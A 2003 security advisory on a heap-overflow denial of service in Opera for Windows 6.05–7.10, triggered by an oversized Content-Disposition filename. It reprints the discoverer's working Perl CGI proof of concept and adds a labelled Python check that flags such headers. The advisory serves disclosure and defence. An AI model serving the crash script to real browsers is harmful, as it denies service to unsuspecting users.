Reported April 28, 2003, by nesumin.

 

 

VERSIONS AFFECTED

 

  • Opera for Windows 7.10 (build 2840), 7.03 (build 2670), 7.02 (build 2668), 7.02 bork (build 2656b), 7.01 (build 2651), 6.06b (build 1145), 6.06 (build 1144), 6.05 (build 1140)

 

DESCRIPTION

 

Several versions of Opera for Windows contain a Denial of Service (DoS) condition. The condition results from an unchecked buffer on the heap and Opera's failure to check the length of a filename.

 

DEMONSTRATION

 

The discoverer posted the following code as proof of concept:

 

================
  This is a Perl script.
  ---------------------------------------------------------------
  #!/usr/bin/perl
  # Smash Heap Memory.
  # This script is a CGI program.

  $|=1;
  my $filename = "." . "\xCC" x (int(rand(0x20000)) + 0x100);

  print "Content-type: text/html\r\n";
  print qq~Content-Disposition: filename="$filename"\r\n~;
  print "\r\n";
  print "<html><body>Love & Peace :)</body></html>\r\n";
  ---------------------------------------------------------------
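
A defensive check for the header used in the demonstration, as an added example that is not part of the original advisory or the discoverer's code: it extracts the Content-Disposition filename from a raw response head (for instance at a filtering proxy) and flags over-long values. The 255-byte limit, the function names and the sample responses are assumptions made for this example.

```python
import re

# Assumed policy limit: 255 bytes, a common per-component filename maximum.
MAX_FILENAME_BYTES = 255

# filename= parameter, quoted or bare, with or without a disposition type
# in front of it (the header on this page has none). Does not match filename*=.
_FILENAME_RE = re.compile(rb'(?:^|[;\s])filename\s*=\s*(?:"([^"]*)"|([^;\s]*))', re.I)

def disposition_filenames(raw_head: bytes):
    """Yield the raw filename bytes of each Content-Disposition header."""
    head = raw_head.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n"):
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"content-disposition":
            m = _FILENAME_RE.search(value.strip())
            if m:
                yield m.group(1) if m.group(1) is not None else m.group(2)

def check_response(raw_head: bytes, limit: int = MAX_FILENAME_BYTES):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    for fn in disposition_filenames(raw_head):
        if len(fn) > limit:
            findings.append(f"filename is {len(fn)} bytes (limit {limit})")
        # RFC 6266 carries non-ASCII names in filename*=, so raw bytes outside
        # printable ASCII in filename= are worth a second look.
        if any(b < 0x20 or b > 0x7E for b in fn):
            findings.append("filename has bytes outside printable ASCII")
    return findings

# Constructed sample responses (not captured traffic).
BENIGN = (b"HTTP/1.1 200 OK\r\nContent-Type: application/pdf\r\n"
          b'Content-Disposition: attachment; filename="report.pdf"\r\n\r\n')
OVERSIZED = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
             b'Content-Disposition: filename=".' + b"\xcc" * 0x100 + b'"\r\n\r\n')

if __name__ == "__main__":
    for label, resp in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(label, check_response(resp) or "ok")
```
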

 

VENDOR RESPONSE

 

Opera (http://www.opera.com/) has yet to respond to this problem.

 

 

CREDIT

 

Discovered by nesumin.